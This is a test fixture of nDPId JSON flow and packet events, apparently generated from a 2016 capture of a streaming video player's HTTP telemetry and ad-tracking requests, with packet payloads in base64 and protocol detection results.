-00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1467353140888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353140888,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5fz1AADMGuwnKbA7bwKhzCABQxSlvvfQ0r4ZCsVAYADyHfQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353141138,"flow_last_seen":1467353141138,"flow_idle_time":7440000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1467353141138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01200{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1467353141138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1467353141138,"pkt":"TF4M6gNlABxCjnAxCABFAAJYBBhAAIAG54\/AqHMIymwO28UtAFDtOXdacCs02FAYAQQdugAAR0VUIC9jb3JlP3Q9MTEmY3Q9YWRlbmQmcmVzZXQ9MCZyYT0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxNDAmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} -01140{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353141138,"flow_last_seen":1467353141138,"flow_idle_time":7440000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1467353141138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1021,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1467353141308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353141308,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5uEFAADMGggXKbA7bwKhzCABQxS1wKzTY7Tl5ilAYADfR4AAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
-01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1467353142534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353142534,"pkt":"TF4M6gNlABxCjnAxCABFAAOkBEBAAIAG5grAqHMIymwO7MUnAFCB65f\/kZem+1AYQRL+yQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNDIwNDQmc2g9JnNxPSZzdz0mdD0xcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1024,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353144633,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1024,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1467353144633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":347,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":347,"pkt_l4_len":313,"thread_ts_msec":1467353144633,"pkt":"ABxCjnAxTF4M6gNlCABFAAFNZb1AADAG6WZ1T1GHwKhzCABQxQsUvd5l87WhOFAYAA4qLgAASFRUUC8xLjEgMzAyIEZvdW5kDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjMzIEdNVA0KQ29udGVudC1MZW5ndGg6IDANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClNldC1Db29raWU6IFY9NjY5Mzg1MTYxNTg4NTA0OTAxMTsgRG9tYWluPW1sdDAxLmNvbTsgRXhwaXJlcz1TYXQsIDAxLUp1bC0yMDE3IDA2OjA1OjM3IEdNVDsgUGF0aD0vDQpMb2NhdGlvbjogaHR0cDovL2NtYy50YW54LmNvbS9hbmRjP2FuZGNfdWlkPTY2OTM4NTE2MTU4ODUwNDkwMTEmYW5kY192ZXI9MQ0KDQo="} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144819,"flow_last_seen":1467353144819,"flow_idle_time":7440000,"flow_min_l4_payload_len":390,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":390,"midstream":1,"thread_ts_msec":1467353144819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00971{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1467353144819,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":444,"pkt_l4_len":410,"thread_ts_msec":1467353144819,"pkt":"TF4M6gNlABxCjnAxCABFAAGuBX9AAIAGQAzAqHMIjM3zQMUyAFBCtQhgUXsfllAYQTeurQAAR0VUIC9hbmRjP2FuZGNfdWlkPTY2OTM4NTE2MTU4ODUwNDkwMTEmYW5kY192ZXI9MSBIVFRQLzEuMQ0KQWNjZXB0OiAqLyoNClJlZmVyZXI6IGh0dHA6Ly9pbWFnZTEud2Vic2NhY2hlLmNvbS92b2RndWlkZS9pbWFnZXMvdGFvYmFvYWQvdGFvYmFvL3Rhb2Jhby5odG1sDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLVRXDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNS4wKQ0KQ29va2llOiBjbmE9L2NBSER3UTFtMndDQVhhakNGbzBCbmxmOyBjbmF1aT0xOTgzMTU5NDkzDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiBjbWMudGFueC5jb20NCg0K"} 
-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144819,"flow_last_seen":1467353144819,"flow_idle_time":7440000,"flow_min_l4_payload_len":390,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":390,"midstream":1,"thread_ts_msec":1467353144819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cmc.tanx.com","url":"cmc.tanx.com\/andc?andc_uid=6693851615885049011&andc_ver=1","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1467353144913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1467353144913,"pkt":"ABxCjnAxTF4M6gNlCABFAAENPiNAACwGXAmMzfNAwKhzCABQxTJRex+WQrUJ5lAYFg2SoAAASFRUUC8xLjEgMjAwIE9LDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ0IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBjbG9zZQ0KU2VydmVyOiBUZW5naW5lDQpUaW1pbmctQWxsb3ctT3JpZ2luOiAqDQoNCjMxDQpHSUY4OWEBAAEAkQAAAAAA\/\/\/\/\/\/\/\/AAAAIfkEAQAAAgAsAAAAAAEAAQAAAgJUAQA7DQowDQoNCg=="} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147705,"flow_last_seen":1467353147705,"flow_idle_time":7440000,"flow_min_l4_payload_len":363,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1467353147705,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00935{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1467353147705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":417,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":417,"pkt_l4_len":383,"thread_ts_msec":1467353147705,"pkt":"TF4M6gNlABxCjnAxCABFAAGTCAFAAIAG5GvAqHMIymwO28UzAFD2bwdscQOwMVAYAQQLYgAAR0VUIC9jb3JlP3Q9MTUwMzI5MSZ0eXBlPXZzJnV1aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mYXJlYT1PVkVSU0VBfFRXX0hpTmV0JmZyb209QlNfSGlnaCZ0bz1CU19TdGFuZGFyZCZwbGF5ZXJfc3dpdGNoX2JzX3RpbWU9NDE3MTQmYXZlcmFnZV9kb3dubG9hZF9zcGVlZF89MTU4NTE1LjIwMDAwMCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDpfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} 
-00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147705,"flow_last_seen":1467353147705,"flow_idle_time":7440000,"flow_min_l4_payload_len":363,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1467353147705,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1503291&type=vs&uuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&area=OVERSEA|TW_HiNet&from=BS_High&to=BS_Standard&player_switch_bs_time=41714&average_download_speed_=158515.200000","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1467353147794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353147794,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FnZAADMGI9HKbA7bwKhzCABQxTNxA7Ax9m8I11AYADa2JwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147927,"flow_last_seen":1467353147927,"flow_idle_time":7440000,"flow_min_l4_payload_len":568,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":568,"midstream":1,"thread_ts_msec":1467353147927,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01211{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1467353147927,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":622,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":622,"pkt_l4_len":588,"thread_ts_msec":1467353147927,"pkt":"TF4M6gNlABxCjnAxCABFAAJgCC5AAIAG43HAqHMIymwO28U0AFClUF0ecJA2DlAYAQSk3gAAR0VUIC9jb3JlP3Q9NSZhPTQmaXNmaW5pc2g9MiZ0bT03JnJhPTImdHJhPTEmcGY9MjAxJnA9MTEmcDE9MTE0JnAyPTMwMDAmc2RrdHA9MSZjMT02JnI9NTAwNDk0NjAwJmFpZD01MDI5NTk5MDAmdT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZwdT0mb3M9d2luZG93cyZ2PTUlMkUyJTJFMTUlMkUyMjQwJmtydj0yJTJFMCUyRTEwMiZkdD0maHU9LTEmcm49MTQ2NzM1MzE0NyZpc2xvY2FsPTAmYXM9ZDE5ZjY0MDQ3YjY0MWNkNmZmMDk2YjA0ZmIyYTMwYjUmdmU9M2NjMGM4ZmEzNzI2MjVlNjQxNDMxNDQ4MTZmM2U5NjgmcGU9Yzk1ZDk5MmUyOTg1NmRjODRmMmU5OTA3YTJlNGIyODImdmZybT0mY2hsPSZoY2Rudj0xMC4wLjAuMjkzJnRwY2Q9MCZpc2RybT0xJmh0PTAgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KcXlpZDphYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6XzIwMTINCnF5cGxhdGZvcm06MC0yDQoNCg=="} 
-01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147927,"flow_last_seen":1467353147927,"flow_idle_time":7440000,"flow_min_l4_payload_len":568,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":568,"midstream":1,"thread_ts_msec":1467353147927,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=4&isfinish=2&tm=7&ra=2&tra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353147&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1467353148016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353148016,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5kRtAADMGqSvKbA7bwKhzCABQxTRwkDYOpVBfVlAYADcrXAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353150114,"flow_last_seen":1467353150114,"flow_idle_time":7440000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353150114,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1467353150114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"thread_ts_msec":1467353150114,"pkt":"TF4M6gNlABxCjnAxCABFAAOlCc1AAIAG4HzAqHMIymwO7MU1AFBQgbYWJ\/60ElAYQTeIsAAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNDkwNDUmc2g9JnNxPSZzdz0mdD1taWQmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NDc5NTMxMDAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0l
FIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} -01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353150114,"flow_last_seen":1467353150114,"flow_idle_time":7440000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353150114,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353149045&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
